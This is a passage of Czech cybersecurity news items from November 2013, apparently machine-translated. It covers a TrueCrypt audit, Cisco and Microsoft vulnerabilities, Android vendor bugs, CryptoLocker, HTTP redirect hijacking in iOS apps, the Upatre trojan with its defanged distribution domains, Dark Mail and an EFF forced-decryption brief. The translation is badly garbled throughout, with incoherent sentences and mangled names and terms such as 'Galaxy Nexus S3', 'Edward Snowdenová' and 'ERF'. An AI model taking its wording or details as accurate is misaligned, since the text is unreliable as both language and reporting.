Řekl White řešení těchto otázek je důležité, aby k vytvoření ověřené, nezávislé na verzi ovládacího historie úložiště kódu, který obsahuje podepsanou zdrojové a binární.
"Myslím, že musíme položit otázku, nikdo se zdá, že někdy opravdu zeptal: Proč jsou některá ustanovení o licenci? Co přesně jsou TrueCrypt vývojáři snaží udělat? Byly spáleny v minulosti? "Řekl White.
Nejistota znění je to, co vedlo Red Hat, Debian a Open Source Initiative doporučit před použitím TrueCrypt. Řekl Green licence nedokáže vysvětlit, jak může být povolení používat a za jakých podmínek.
"Je to neřekl by bylo možné použít licenci za těchto podmínek a je to fajn, že je to banda věcí, které byste nemohli dělat s ním, a to není jasné, co byste mohli udělat," řekl Green. "Zdálo se, že mají, ať už byl napsán někým, kdo neví, jak psát licencí velmi dobře, nebo to bylo napsáno ve zlém úmyslu. To nikdo neví. "
Tam jsou také legitimní otázky o tom, zda je licence vymahatelná podle stávající judikatury, řekl White, s odkazem na výše uvedené ustanovení. Nejasnost sahající půl desetiletí nebo více stále straší TrueCrypt a přispívá k současné atmosféře nedůvěry.
"Vlastně si myslím, celá tato cvičení je jen důkaz počátků mnohem větší výzva k zbrani pro bdělosti, přes open source a bezpečnostní komunity obecně," řekl White. "Buďme upřímní, když NIST doslova připomíná zveřejněn kryptografické primitivum a" důrazně doporučuje používat "to, nad důkazy záměrných snah oslabit šifrovacích standardů zpravodajskými agenty v USA, jsme vstoupili do zcela nové éry. A RSA BSAFE a DPM oznámení slouží pouze podtrhnout, že imperativ.
"Je zřejmé, že jsme se společně věnovat pozornost teď," řekl White. "Zde je doufat, náš skromný projekt bude dělat díru v obnově nějaké tolik potřebné sebevědomí."
Cisco Opravuje prázdný Heslo správce Chyba v TelePresence produktu
6.11.2013 Zranitelnost | Zabezpečení
Cisco oprava řadu chyb v několika samostatných produktů, včetně vážného remote chyby spuštění kódu ve své široké oblasti služeb Aplikace Mobilní software, který by mohl útočníkovi umožnit převzít úplnou kontrolu nad zranitelnou zařízení.
Cisco má také oprava zranitelnost ve svém TelePresence VX klinické konference asistent video systému pro prostředí zdravotní péče. Oprava zavře díru, která umožnila útočníkovi přihlášení k účtu správce pomocí prázdné heslo.
"Zranitelnost ve Wil-modul Cisco TelePresence VX klinický asistent by mohlo neověřenému vzdálenému útočníkovi dovolit přihlásit jako admin uživatele zařízení pomocí prázdné heslo, " Cisco poradní řekl.
"Tato chyba zabezpečení je způsobena chybou kódování, které resetuje heslo pro admin uživatele k prázdným heslem na každém restartu. Útočník by mohl zneužít tuto chybu zabezpečení přihlášení do administračního rozhraní jako admin uživatele s prázdným heslem. "
Mezitím WAAS Mobile zranitelnost postihuje všechny verze softwaru před 3.5.5 a společnost vydala novou verzi, která obsahuje opravu pro chybu.
"Zranitelnost je důsledkem nedostatečné ověření uživatelem dodaných dat v těle požadavku HTTP POST. Útočník by mohl zneužít tuto chybu zabezpečení tvorbě HTTP POST požadavek na nahrání obsahu, které by mělo za následek nekontrolované adresáře průchod. Exploit by mohla útočníkovi umožnit spuštění libovolného kódu WAAS Mobile serveru s právy na webovém serveru IIS, " Cisco poradní říká.
"Zranitelným patří do webového rozhraní pro správu, ale v nasazení, kde se používá více než jedna Cisco WAAS Mobile Server pak všechny servery, které jsou zranitelné, a to nejen ten, provedení Manager role a hostování webové rozhraní pro správu."
Nicméně, Cisco řekl, že chyba nemá vliv na všechny klienty spuštěné softwarové, pouze servery.
Společnost také vydala opravu zabezpečení v SIP provedení v jeho IOS software, který běží na mnoho z jeho serverů a dalších zařízení. Chyba by mohla umožnit útočníkovi způsobit denial-of-service stav na zranitelné zařízení.
"Tato chyba zabezpečení je způsobena nesprávným zpracováním speciálně vytvořených SIP zpráv. Útočník by mohl tuto chybu zabezpečení zneužít odesláním specifické platné SIP zpráv na bránu SIP. Exploit by mohla útočníkovi umožnit spuštění nevracení paměti nebo zařízení Obnovit ", poradní říká.
Útoky na New Microsoft Zero Day Použití vícestupňových malware
6.11.2013 Počítačový útok | Viry
Útočníci vykořisťovat Microsoft Windows a Office nula den odhalil včera používáte exploit, který obsahuje škodlivý soubor RAR, stejně jako falešný dokument Office jako návnadu, a instalujete širokou škálu škodlivých komponent na nově infikovaných systémů. Útoky vidět tak daleko jsou zaměřeny hlavně v Pákistánu.
CVE-2013-3906 zranitelnost zveřejněna úterý Microsoft, je vzdálené spuštění kódu chyba, která se týká způsobu, jakým systém Windows a Office zvládnout některé TIFF soubory. Microsoft uvedl, že útočníci, kteří jsou schopni zneužít chybu by měl být schopen spustit libovolný kód v napadených počítačů. V cílených útoků vidět výzkumníky tak daleko, útočníci se pomocí ROP technik tuto chybu zabezpečení zneužít a pak instalaci downloader, který táhne dolů některé další součásti, včetně dokumentu sady Office, který je zobrazen uživateli jako rozptýlení od toho, co se děje v pozadí.
Výzkumníci analyzovali AlienVault exploit a malware používán v cílených útoků a zjistil, že poté, co útočníci ohrožena stroj, ale také stáhnout soubor RAR, který obsahuje komponenty, které volá zpátky na velení a řízení serveru a stáhne počet škodlivých komponent. Malware nainstaluje keylogger, vzdálené backdoor a část, která krade různé typy souborů, včetně XLS, DOC, PPT a PDF soubory.
CVE-2013-3906 chyba zabezpečení se týká Windows Vista a Office 2003-2010 a Microsoft doporučuje, aby uživatelé se systémem zranitelné verze nainstalovat nástroj Fixit oni pustili úterý, což pomáhá zabránit vykořisťování. Instalace Emet nástrojů lze také chránit uživatele proti útokům na této chyby zabezpečení.
Většina IP připojují k C & Cs používané v těchto útoků, jsou zasílány z Pákistánu, AlienVault vědci. Výzkumníci společnosti Kaspersky Lab analyzoval malware a jeho chování a našel nějaké zajímavé chování.
"Tohle není první chyba ve formátu TIFF. Notoricky známý CVE-2010-0188 (na základě TIFF taky) je široce používán v PDF využije i nyní. Nový 0den používá chybně TIFF údajů obsažených v dokumentech sady Office, aby se spustit shell kód pomocí haldy sprej a ROP techniky. Již jsme zkoumali některé shellcodes - vykonávají společné akce (pro shellcodes): Vyhledat API funkcí, stáhněte a spusťte náklad. Vzali jsme si pohled na stažené nákladem - zadní vrátka a trojských-špioni. Naše AEP technologie zabraňuje spuštění jakéhokoli spustitelného souboru využívaných aplikací. V tomto případě je naše AEP chránit a nadále chrání uživatele příliš, "řekl Vjačeslav Zakorzhevsky, vedoucí skupiny zranitelnosti výzkumu v Kaspersky.
Prodejce Přizpůsobení vést k bezpečnostním otázkám v Android telefony
6.11.2013 Mobil | Zabezpečení
Když výrobci telefonů Android vyladit zařízení a přizpůsobit telefony se speciálním softwarem, aplikacemi a kód, to má přímý vliv na bezpečnost jednotlivých zařízení. V některých případech, mohou být provedené změny tvoří více než 60 procent chyb nalezených v zařízení.
To je podle dokumentu " Dopad Prodejce customizations Android bezpečnosti , "(. PDF), kterou nedávno zveřejnila skupina studentů počítačových věd na North Carolina State University s pomocí Android výzkumníkem a NC State profesora Xuxian Jiang.
Výzkum, který má být předložen na 20. konferenci ACM na počítači a bezpečnosti komunikací v Berlíně ještě dnes.
Ve studii výzkumníci sledovali 10 různých chytré telefony Android (HTC One X, Galaxy Nexus S3, atd.), z pěti různých výrobců, dva na jednoho dodavatele, za generace (pre-2012 2.x build a post-2012 4.x sestavení) a zkoumal bezpečnostní chyby, které pramení z každého zařízení je přizpůsobené nastavení.
Pomocí nástroje s názvem Security Evaluation rámec pro Android (SEFA), výzkumníci se podíval na tisíce řádků kódu určit, každé předplněné app původ (kdo je autorem ho), povolení použití (kolik oprávnění každá aplikace má) a jeho zranitelnosti distribuci ( mohla být ohrožena app). Nástroj SEFA, vyvinutý výzkumníky, v podstatě dívá na firmwaru telefonu, porovná jej skladem Android Android od projektu source open (AOSP) kód a pomáhá detekuje chyby v aplikacích.
Osmdesát dva procent z aplikací skenování přišel přizpůsobit prodávajícím a 86 procent těchto aplikací končily bytí to, co vědci nazývají overprivileged, což znamená, že "zbytečně požadovat další Android oprávnění, než ve skutečnosti používají."
Zatímco spousta pákových oprávnění apps uživatelů, kvintetu výzkum také hledal legitimní "reálné, žalovatelné využije" v telefonech. Mezi 65 procent a 85 procent z chyb zjištěných na LG, Samsung a HTC telefonů přišla jako přímý důsledek úprav prodejců. Skupina našel několik zlomených zabezpečení kritických oprávnění v aplikacích, které lze posílat SMS zprávy jménem uživatele bez jejich svolení a sdělovat osobní informace.
Například výzkumníci našli předinstalovanou aplikaci v telefonu Samsung Galaxy S3 s názvem Keystrong_misc . Pokud ohrožena, může to vést k řadě reflexe útoků a jít dolů "nebezpečnou cestu pro provedení továrního nastavení, čímž vymazání všech uživatelských dat na zařízení."
Chyby v LG Optimus P880, další telefon Výzkumníci analyzovali by mohlo vést k restartu zařízení a vystavit přístup k několika schránek tabulek.
Xuxian a jeho studenti tvrdí, že se pokusil kontaktovat příslušné telefonní prodejců a zatímco někteří potvrdily zranitelnost jiní ještě nemluvil s nimi "po několika měsících," podle papíru.
Screen Shot 2013-11-06 na 10.44.06 AMSnad nejvíce znepokojující trend ve studiu a něco, co se může kývat změnu ve způsobu, jakým dodavatelé předem naložit zařízení do budoucna je, že tam opravdu není velký rozdíl ve výši zranitelnosti z jedné generace telefonů další.
"Prodejce aplikace trvale vystaveny oprávnění overprivilege, bez ohledu na generace," píše jedna část papíru.
Zatímco technicky počet chyb a overprivileged apps (viz vpravo) se snížil z pre-2012 telefonů po roce 2012 telefon, vzory byly stabilní v průběhu času, což naznačuje, "potřebu zvýšeným zaměřením na bezpečnost ze strany smartphone průmyslu," říká Xuxian a společnost.
Problém je, protože Android je jako masivně populární open source platforma, Google dělá to, distribuuje jako AOSP a výrobci a dopravci jsou zdarma vyladit to, jak uznají za vhodné. To vede k zcela pestrou produkt s kompletní aplikací třetích stran a nesmyslné bloatware, že na konci se podobá roztříštěné verze původního softwaru.
US-CERT varuje CryptoLocker infekce na vzestupu
6.11.2013 Viry
CryptoLocker je nevyzpytatelný vývoj se známými Ransomware systémech, ve kterých malware šifruje soubory, které najde na řadě síťových zdrojů a požaduje výkupné za dešifrovací klíč.
US-CERT vydalo poradenské firmy dnes varovné a spotřebitele rizik představovaných CryptoLocker, který byl na radaru bezpečnostních expertů od konce října. US-CERT řekl infekce jsou na vzestupu a vyzýváme oběti neplatit výkupné, místo toho, nahlaste to na internetu Center FBI kriminality stížnosti.
Oběti, mezitím, mít tři dny na na splátky s útočníky, a to buď prostřednictvím MoneyPak nebo Bitcoin.
"Některé oběti prohlašovali, online, které jsou placené útočníky a nedostali slíbené dešifrovací klíč," US-CERT poradenství řekl.
CryptoLocker se šíří prostřednictvím řady podvodných akcí, včetně některých z legitimní podnikání, nebo prostřednictvím falešné Federal Express nebo UPS sledování oznámení. Některé oběti řekl CryptoLocker se objevil po samostatném botnet infekci, US-CERT řekl.
Malware čichá se soubory v řadě síťových zdrojů, včetně sdílených síťových disků, výměnná média, jako jsou USB flashdisky, externí pevné disky, sdílených síťových souborů a některých služeb cloud storage.
"Pokud jeden počítač v síti nakazí, může namapované síťové jednotky také nakazit," US-CERT varuje poradenství s tím, že oběti by měly okamžitě odpojit své počítače od jejich drátových nebo bezdrátových sítích okamžitě při pohledu na červenou obrazovkou oznámení smířit podle CryptoLocker, který poskytuje informace o tom, jak obnovit šifrované soubory.
Jakmile malware západky na počítač oběti, to se připojí na útočníkův příkazu serveru a ukládá asymetrické šifrovací klíč, který by uvolnil oběti soubory.
Costin Raiu, ředitel Global Research and Analysis Team na Kaspersky Lab, řekl CryptoLocker používá doménu algoritmus generace dává malware až 1000 možných doménových jmen, z nichž se připojit k jeho velení a řízení infrastruktury. Raiu dodal, že Kaspersky sinkholed tři domény a sledovat více než 2700 domén se snaží kontaktovat tyto domény během tří dnů v polovině října se většina obětí v USA a Velké Británii.
Malware jako CryptoLocker není bez precedentu. GPCode malware používá RSA klíčů pro šifrování, počínaje 660-bit RSA před upgradem na 1024, "uvedení snad jen v říši praskání moci NSA," řekl Raiu.
"CryptoLocker používá pevný šifrovací schéma stejně, což doposud jeví uncrackable," Raiu přidán.
Mezitím, bezpečnostní blog Krebs o bezpečnosti dnes oznámila, že útočníci stojí za CryptoLocker mohou být na jejich zmírnění uloženého 72hodinové lhůtě splatnosti. Vzhledem k tomu, že útočníci požadovat platbu prostřednictvím třetích stran, možnosti, které oběti nemusí být obeznámeni s, mohlo by se stát, že útočníci přišli o nějaké peníze.
"Rozhodli se, že je trochu smysl nepřijímá výkupné týden později v případě, že oběť je stále ochoten zaplatit, aby si své soubory zpět," Lawrence z BleepingComputer.com Abrams řekl Krebs. Abrams dodal, že zatímco CERT a někteří prodejci mohou být poradenství obětem neplatit, některé jsou zával, protože si nemohou dovolit být bez svých ztracených souborů pro značné množství času.
HTTP 301 Přesměrování vést k problémům pro mobilní aplikace
6.11.2013 Zabezpečení | Mobil
Tisíce mobilních aplikací vyvinutých na platformě Apple iOS nemůže být nucen k zobrazení falešné, a to i škodlivý obsah, kvůli zranitelnosti, která umožňuje útočníkovi přesměrovat provoz na webu třetí strany a trvale poskytovat obsah z tohoto umístění.
Vědci z izraelské mobilní společnosti Skycure byl naplánován předloží podrobnosti o svých zjištěních dnes na zasedání v RSA Europe v Amsterdamu.
Útok, přezdívaný HTTP Request Únos (HRH) vyžaduje, aby útočník provést man-in-the-middle útok přes otevřené Wi-Fi připojení k internetu. Jakmile útočník umístí sám, může se zachytit HTTP požadavků, a přesměrovat je přes HTTP 301 přesměrování, nebo na straně serveru 301 Trvale přesunuto žádost. Tato žádost je uložena do mezipaměti mobilní aplikace a jakmile uživatel otevře zranitelnou aplikaci znovu, bude to připojit s serveru útočníka a ne zamýšlená stránkách.
"Zatímco 301 Trvale přesunuto HTTP reakce musí hodnotné využití, ale také má vážné následky na security mobilních aplikací, jak by mohla umožnit nebezpečný útočník se trvale měnit a dálkově ovládat způsob, jakým aplikační funkce, aniž by rozumným způsobem za oběť vědět o tom, "napsal Skycure CTO Yair Amit v blogpost .
HRH nepředstavuje stejné riziko na stolní prohlížečích, protože adresa URL v adresním řádku změní a může být si všiml uživatelem. Mobilní aplikace nejsou obecně zobrazení stránky, na které se připojíte, vedení tajné spojení tajemství, řekl Amit.
HTTP 301 odpovědí se používá pro trvalé přesměrování webovou stránku. Stránky, které se stěhují do nové domény použít přesměrování 301, stejně jako stránky, které lze přistupovat přes trochu jiné URL, jeden je vybrán jako kanonický určení, podle podpory Google doc , zatímco ostatní budou přesměrování na tuto adresu URL pomocí 301 odpověď.
Problémem tohoto útoku, Amit řekl, je to, že mobilní aplikace udržuje 301 odezvu v paměti a trvale spojuje tak na útočníkův web server. Tento server pak může klesnout jakéhokoli obsahu do aplikace, včetně odkazů na nebezpečné stránky.
Amit řekl, že mají důkaz o koncepci, která funguje na iOS, ale protože je to spíše obecný útok, mohlo by to fungovat na jiných mobilních operačních systémů.
"Šli jsme k testování spoustu vysokých profilových aplikací, a byli překvapeni, zjistíte, že asi polovina z nich byly náchylné k útokům lidských zdrojů ve zdravotnictví," řekl Amit. "Zaměření na předních aplikace app Novinky Obchod jsme zjistili, mnoho z nich zranitelné a snadné zneužít."
Amit dodal, že zatímco útok funguje docela dobře proti nezašifrované relace, také to může být namontována na provoz protokolu HTTPS.
"Je zajímavé si povšimnout, že láká oběť nainstalovat škodlivý profil, který obsahuje kořenové certifikační autoritě, útočník může připojilo HRH útoky na SSL provozu stejně," řekl Amit. "Kombinace škodlivý profily hrozbu Odhalili jsme společně s touto novou hrozbou HTTP požadavku únosu, vytváří znepokojující scénář: I po škodlivý profil identifikovat a odstranit ze zařízení, napadl aplikace nadále bezproblémové interakce s útočníkem serveru namísto skutečné serveru, aniž by oběti poznání. "
IOS vývojáři jsou nuceni hledat zranitelnosti v jejich aplikací, Amit a dodal, že aplikace musí připojit pomocí protokolu HTTPS, i když to není stoprocentní obrana.
Microsoft: XP Konec životnosti Důležité bezpečnostní Milestone
6.11.2013 Zabezpečení
Zapomeňte na chvíli na hrozící cryptoapocalypse kvůli stárnutí a / nebo zneužita šifrovacích standardů a algoritmů. Microsoft tento týden uhasit slovo na metly, která je Windows XP.
Poslední Microsoft Security Intelligence Report jde do obrovských bolestí podporovat uživatele, aby posunout mimo brzy-k-být nepodporovanou verzi systému Windows. Zpráva odráží činnost vybírá a sleduje jeho bezpečnostních nástrojů, od ledna do června, poukazuje na to, že XP počítače jsou šestkrát větší pravděpodobnost, že se infekce než u mladších, robustnější verzí operačního systému.
"Starší software je snazší proniknout do a časem, zločinci se naučit, jak obejít snižující závažnost rizika," řekl mluvčí společnosti Microsoft Holly Stewart. "XP se v ničem neliší. Dobrým příkladem je DEP (Data Execution Prevention), která nebyla běžně obejít když to bylo propuštěno. Užitečnost tohoto zmírnění má zhoršenou rok více než rok. "
DEP a rozvržení adresního prostoru Náhodnost (ASLR) jsou paměťová ochrany zabudované do Windows počínaje Windows Vista. Jsou určeny k odvrácení útoků buffer overflow a zmařit hackeři jsou schopni aplikovat kód do předvídatelných oblastí paměti v operačním systému. V roce 2006, tam byl jeden DEP bypass na každých 13 zranitelností, které se stalo téměř čelem vzad od roku 2012, Microsoft uvedl, se šesti bypassy se děje na každé tři CVEs. Hackeři byly nalezeny důmyslné prostředky bití DEP a ASLR, seřazovat využije pro řadu chyb obejít i tyto ochrany a ohrozit data uložená na hostitelském počítači.
"Novější software je méně atraktivní pro zločinci," řekl Stewart. "Pokročilá technologie je těžší využít, a tam byl dlouhý seznam vylepšení platformy zabezpečení. XP, nicméně, není vybavena pro tyto inovace. "
Microsoft již nebudou podporovat XP po dubnu příštího roku, což znamená, že již nebude poskytovat bezpečnostní záplaty a doporučení a upozornění zranitelnosti objevené na platformě. Avšak podle nejnovějších desktopových operačních systémů čísla o podílu na trhu, XP instalace stezka pouze pro Windows 7, XP Netmarketshare.com říká, že stále běží na 31 procentech počítačů. Windows 7 vede s 46,4 procenta.
"Z bezpečnostního hlediska je to velmi důležitý milník," řekl Stewart. "Útočníci začne mít větší výhodu obránci. Tam bylo 30 bulletinů zabezpečení pro systém Windows XP letos, což znamená, že by došlo k 30 zero-day zranitelností ve Windows XP [bez podpory]. "
Microsoft také používá novou metriku, porovnávání nakažených s tím, co volá setkání rychlost. Jak je vysvětleno ve zprávě BIS, "setkání" jsou kolikrát jeden z nástrojů firem bezpečnostních například Microsoft pro odebrání nebezpečného softwaru naráží kus malware. Dříve, Microsoft by počítat to, co nazývá Počítače vyčištěné promile, nebo CCM. Sol byl počet počítačů vyčištěných za každých 1000 krát MSRT byla zakopl o kus malware.
Pomocí nové metriky, Microsoft ukazuje, že XP SP3 systémem jsou šestkrát větší pravděpodobnost, že se nakazí, než někoho systémem Windows 8 RTM na jejich strojově 9,1 počítačích XP vyčištěných za 1000 oproti 1,6 Windows 8 strojů. Pokud jde o setkání sazby, čísla nejsou příliš překvapivě liší s 16,1 procenta XP SP3 strojů vykazujících setkání oproti 19,1 procenta počítačích se systémem Windows 7 a 12,4 procent počítačů se systémem Windows 8.
"Setkání rychlost vám dává představu o tom, jak často zákazník je vystaven malware hrozby," řekl Stewart. "Dosáhli jsme bodu zvratu, kde to může ze dne architektura nelze na ně spoléhat."
Upatre Trojan ke stažení Malware Malware, že stažení
6.11.2013 Viry
Výzkumníci z Microsoft Malware Protection Center (MMPC) viděli nárůst počtu Win/32.Upatre infekcí v posledních měsících. Trojský kůň ohrožuje hostitelských počítačích, pomocí škodlivých e-mailových příloh a po instalaci se pohybuje stáhnout jiný malware z jeho velení a řízení serveru.
Upatre Report Count
Spam kampaň distribuce Upatre s těmito škodlivými přílohami, kde "<variable names>" mohou být domény, firemní a individuální jména, nebo i náhodných písmen nebo slov:. USPS_Label_ <random number> zip, USPS - Zmeškané balíček delivery.zip , prohlášení o Account.zip, <number> -.... <number> zip, TAX_ <variable names> zip, Case_ <random number> zip, Remit_ <variable names> zip, ATO_TAX.zip a ATO_TAX_ <názvy proměnných >. zip.
Telemetrie údaje naznačují, že Upatre je správci přinášejí trojan s exploit kity zaměřené Java a PDF chyby stejně.
Podle MMPC, Upatre je především vedení pro zajištění dalšího škodlivého softwaru. Tak daleko, jeho oblíbená dodávka "Win32/Zbot.gen! AM," rodina malware, který krade přihlašovací údaje a případně postoupí kontrolu nad infikovaných počítačů k útočníkovi. Více nedávno, vědci viděli trojan instalaci "TrojanDropper: Win32/Rovnix.I" stejně. Rovnix píše škodlivého kódu NewTechnologyFileSystem (NTFS) boot sektor údajně injekčně kód do explorer.exe, aby bylo možné stahovat další malware z domény 'youtubeflashserver [dot] com "pokaždé infikovaný počítač restartuje.
Upatre táhne tento malware z řady oblastí, včetně mytarta [dot] com, cyclivate [dot] com, pentruder [dot] co [dot] cz a huyontop [dot] com.
Malware Zbot historicky nasazen domény generace algoritmus detekce otřesů, jak to stáhne jeho aktualizace. V MMPC vědci tvrdí, že se stále příliš stahovat další malware, na první kus Bitcoin-přebírající ransomware známý jako CryptoLock , ale později "Trojan: Win32/Necurs.A" stejně, kus malware, o které je dosud známo jen málo .
Upatre je téměř výlučně americký problém, se téměř 97 procent infekci dochází tam. Ve velmi vzdálené druhé, třetí, čtvrté, páté a pořadí jsou Spojené království (0,89 procenta), Kanada (0,46 procenta), Austrálie (0,27 procenta) a Japonsko (0,19 procenta).
Jak Tmavě Mail plánuje vybudovat otevřený, Secure Email platformu
6.11.2013 Zabezpečení
Nový Tmavě Mail Aliance tvoří tento týden Lavabit a Silent Circle nabídne otevřenou platformu pro bezpečný e-mail, který bude používat stávající protokoly a cloud storage jako způsob, jak vyhnout se dohledu. Nový systém, který by měl být k dispozici v příštím roce, je v některých ohledech návrat k pre-internetové dnů úředníci podílející se na projektu řekl.
The Dark Mail Projekt je reakcí na současnou situaci dozoru, jeden to způsobeno jednak Lavabit a Silent Circle uzavřít své předchozí zabezpečené e-mailové nabídky. Lavabit, což je služba, která údajně NSA zrádce Edward Snowdenová používat, vypněte své služby spíše než vyhovět žádosti z FBI pro své šifrovací klíče. Vidět nápis na zdi, Silent Circle rozhodl ukončí svou vlastní Silent schránku preventivně brzy poté.
V týdnech po těchto uzávěrů v srpnu inženýři z Silent Circle začal mluvit s Lavabit zakladatel LADAR Levison a brzy přišel na myšlenku na vybudování nové, Web-based bezpečnou e-mailovou platformu, která by byla odolná vůči dohledu a zadní vrátka. Myšlenka, řekl Jon Callas, spoluzakladatel Silent Circle, zahrnuje zaslání krátké směrování zprávu zamýšleného příjemce e-mailu přes protokol jako XMPP. Toto poselství bude mít odkaz na umístění cloud úložiště, kde si uživatel může vyzvednout skutečný e-mail. Že e-mail budou šifrovány a a klíč k dešifrování bude zahrnuta do směrování zprávy.
"To oddělí směrování a adresování od skutečného obsahu e-mailu," řekl Callas. "To je to tak e-maily, které by mohly být cokoliv, od deseti znaků na několika megabajtů, které nemusí být tlačil celou cestu dolů lince a převedena ze serveru na server, a ujistěte se, že všechno je v bezpečí."
Callas, cryptographer a bývalý spoluzakladatel PGP Corp., což je další bezpečný e-mail poskytovatele, řekl, že v některých ohledech, tmavý Mail nápad spoléhá na pojmy z úsvitu věku internetu.
"To se podobá v mnoha ohledech věci, které se dějí v pre-internetové dnů. SMTP sloužil nám dobře po mnoho let, ale nebyl navržen, aby byl bezpečný vůbec, "řekl Callas. "To znamená, že je tu všechny druhy metadat, které nemohou být šifrované a tyčinky asi navždy. Tato data by měla být v protokolu někde, ne v e-mailu. Je to opravdu triviální pro lidi, aby si to vyzvednout a udělat analýzu metadat na to.
"To se děje vpřed do minulosti. Chceme se vrátit k použití věci, které byly použity na LAN a aktualizovat jej pomocí silné šifrování. Toto bude nabízet otevřený pro internet. Proč ne jen otevřít pro všechny? Všichni jsme se rozhodnout, že je to lepší pro svět mít otevřenou, non-SMTP způsob, jak dělat e-mail a ti z nás, kteří jsou v e-podnikání může nabídnout služby, co chceme na této infrastruktuře. E-mail byl původně provedena bez zajištění a vůbec jsme se vytáčí to od té doby. Proč ne začít znovu s vysokou úrovní bezpečnosti a nechat lidi vytočit dolů, pokud chtějí? "
Callas řekl, že doufá, že nová nabídka bude k dispozici někdy v roce 2014, ale hodně to závisí na výši pomoci Tmavě Mail Aliance dostane od zbytku komunity.
"Vnímáme to jako, když je to úspěšné, bude vylepšený lidé různými způsoby, protože neočekávám, že naše představy o tom, jak to udělat, je perfektní," řekl Callas. "Nemyslím si, že jsme se vyřešit každý problém existuje."
Výzkumník příspěvky Bug Podrobnosti o zdi Zuckerberg
6.11.2013 Zranitelnosti | Zabezpečení
Zpět v srpnu, Khalil Shreateh, palestinský bezpečnostní výzkumník seznam jeho stav úlohy jako "unemployee" objevil chybu na Facebooku, svět je největší sociální sítí, která mu dala možnost posílat obsah na jakémkoli jiném uživatele ose. On pak udělal to, co každý mladý podnikatelský bezpečnostní výzkumník udělá: šel rovnou na vrchol, vysvětlovat to, co on objevil se příspěvku na zdi Facebooku zakladatel a generální ředitel Mark Zuckerberg.
To je pravda, prozradil detaily z jeho chyby zneužije chybu, abyste mohl psát podrobnosti o ní na časové ose CEO Facebooku.
Aby bylo jasno, Shreateh tvrdí, že se pokusil několikrát sdělit své chybu do Bílého Facebooku Hat program, ale došlo k nedorozumění mezi nimi. Zřejmě Shreateh nebyla poskytuje dostatek technických informací. Facebook by později potvrdil existenci této chyby, vypněte Shreateh je Facebook účtu, a nakonec udělit mu žádnou odměnu za chyby, vysvětlovat to že on porušil podmínky služby s jeho demonstraci.
Překvapivé je, že incident byl malý více než nedorozumění. Facebook aktivovat Shreateh účet krátce poté, co jej deaktivovat.
Ve skutečnosti, Facebook mluvčí řekl Threatpost prostřednictvím e-mailu, který Shreateh od té doby hlášeno více chyb na jejich bílý klobouk programu po správné pokyny pro tyto a přijímání plateb nájemné v pořadí.
Zranitelnost zde není neuvěřitelně kritický, ale Facebook uživatelé by neměli mít možnost posílat obsah nebo dokonce zobrazit zdi někým jiným než svými přáteli, pokud uživatel přijímání obsahu odešla do jejich nastavení a výslovně povoleno, aby každý příspěvek na zdi.
Sheateh odhalil chybu přes bílé Facebooku Hat programu provedením útok na zdánlivě náhodném uživatele. Zpočátku se bezpečnostní tým na Facebooku reagoval na Sheateh řekl mu, že to, co zjistili, bylo to chyba, která Sheateh tvrdí, je důvod, proč on pak musel provést útok znovu publikovat příspěvek na časové ose Zuckerberg ukázat, že existovala zranitelnost.
To samozřejmě není to, co většina výzkumníků by za odpovědný zveřejnění, což je pravděpodobně důvod, proč Sheateh neobdrželi platbu nájemného, když Facebook nakonec uznal chybu.
EFF dělá případě, že Pátý dodatek chrání před nucen dešifrování
6.11.2013 Šifrování
S novými úniky o rozsahu dohledu amerického vládního přichází téměř denně, jeden konstantní zůstává mezi všemi odrazovat od zvědavých očí NSA: práce šifrovací technologie. Pokud je nám známo, matematika za šifrování je solidní, i přes vidinu nějakého nejmenovaného průlom podané špionážní agentura před několika lety.
V Snowden dokumenty nezdá se, že odůvodnění tohoto průlomu dosud, každý úspěch NSA má v bití šifrování mohou pocházet z rozvracení NIST standardy používané na vybudování technologie do produktů, nebo společnostem legálně nucené nebo nutil do předání šifrovacího klíče .
Tečně, vláda pokračuje snažit, aby případ pro schopnost donutit někoho je podezřelý ze spáchání trestného činu dešifrovat jejich pevné disky a otočte důkazů. V minulosti několikrát, že soudy potvrdil popáté ochrany proti sebeobviňování v takových případech.
V případě, který začíná v pondělí v Massachusetts nejvyšší soudní dvůr, odvolání dřívějšího rozhodnutí proti Leon Gelfgatt, 49, Marblehead, Massachusetts, právník, byl obžalován v podvodu hypotečních podvodů , ve kterém je údajně ukradl více než 1.300.000 dolary. Vláda ve snaze, aby svůj případ proti Gelfgatt, snažil donutit ho dešifrovat jeho pevný disk. Soudce v případě, nicméně, odmítl požadavek říká, že taková akce by bylo porušením pátého dodatku.
Digitální nátlakovou skupinu, Electronic Frontier Foundation, spolu s americkou unie občanských svobod, podal amicus krátký včera vysvětlovat popáté výsadu nebýt donucován k sebeobvinění zakazuje nucen dešifrování. Hanni Fakhoury, personál právník s ERF, napsal v blogpost , že Pátý dodatek chrání jednotlivce z odhalení "obsah jeho mysli" a že vláda prostřednictvím této akce by se učit nové skutečnosti v případě po šifrovacího klíče.
"Tím, že nutí Gelfgatt přeložit zašifrovaná data nemůže přečíst do čitelného formátu by se učit, co nešifrovaná data byla (a zda údaje existovaly)," Fakhoury napsal. "Navíc, vláda by se dozvědět možná nejdůležitější skutečností:. Gelfgatt že měl přístup k a panství a kontrolu souborů na zařízení"
Vládní argument je, že dešifrování je podobný poskytuje kombinaci odemknout bezpečný, spíše než přesvědčivý výrobu dešifrovaných souborů.
"Toto tvrzení je nesprávné," řekl stručně. "Stejně jako šifrování disku šifruje každý jeden z jeho souborů dešifrování disk je k dispozici kopie všech svých souborů." Tvrzení, že je, protože data jsou transformována a míchaná, dešifrování je více než klíčové, bezpečné spojení nebo heslo, krátký řekl.
V únoru 2012, federální odvolací soud rozhodl, že muž Florida jeho práva byla porušena, když byl uvězněn za odmítnutí dešifrování jeho pevný disk . EFF říkal, že toto bylo poprvé, kdy odvolací soud rozhodl Pátý dodatek chrání proti nucen dešifrování .
EFF je Fakhoury řekl Threatpost, že vláda v minulosti naznačil, že šifrování je používán pouze zločinci na pokrytí jejich stopy, zatímco nedostatek poukázat na legitimních obchodních a osobních důvodů-k šifrování dat, jako je ochrana obchodního tajemství či osobních údajů.
"V kontrolním prostředí, je potřeba pro šifrování je obzvláště silná, protože se často zdá, že silná technologie je naše poslední útočiště od vlády zvědavých očí," řekl Fakhoury. "Viděli jsme ve všech úniků úsilí vlády podkopat web šifrování a musíme se ujistit, že nemohou ohrozit fyzický šifrování zařízení tady."
Google Chrome automaticky blokovat škodlivý stažení
6.11.2013 Aktualizace
Google plánuje přidat novou funkci svého prohlížeče Chrome, který bude blokovat škodlivý stahování automaticky, pomáhá předcházet drive-by download a druh malwaru, který jezdí spolu s údajně legitimní software.
